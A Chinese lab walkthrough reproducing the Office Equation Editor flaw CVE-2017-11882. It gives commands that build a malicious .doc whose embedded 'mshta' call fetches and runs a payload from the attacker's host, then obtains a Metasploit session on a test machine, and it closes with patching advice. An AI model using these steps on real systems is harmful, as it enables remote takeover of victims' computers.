【漏洞复现】CVE-2017-11882(通杀Office 20
1、漏洞概述
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。
影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016
2、漏洞测试
poc下载链接:https://github.com/littlebin404/CVE-2017-11882.git
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
![](https://img.haomeiwen.com/i17109564/886c74bea34265bb.png)
点击生成的”test.doc”,顺利弹出计算机工具,poc脚本测试成功。
漏洞利用(本实验在win7环境下)
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc
![](https://img.haomeiwen.com/i17109564/b58e85456ed9676c.png)
成功生成11882-3.doc word文件。将文件拷贝到win7靶机中。
![](https://img.haomeiwen.com/i17109564/5968b9b2ae859c2d.png)
将cve_2017_11882.rb文件放置到渗透机器:/usr/share/metasploit-framework/modules/exploits/windows/smb目录下。
![](https://img.haomeiwen.com/i17109564/5f621bd346efd705.png)
开启监听状态:
![](https://img.haomeiwen.com/i17109564/e01f2e4d0f6b938e.png)
点击win7靶机中的11882-3.doc文件,获取sessions成功!!!!
![](https://img.haomeiwen.com/i17109564/930a1bb020e19638.png)
使用sysinfo查看系统信息皮一下!!!!
4、漏洞修复
①在线更新;开启Windows Update更新,这种方式对于大部分人来说就够了。
②打补丁;此漏洞对应的微软补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882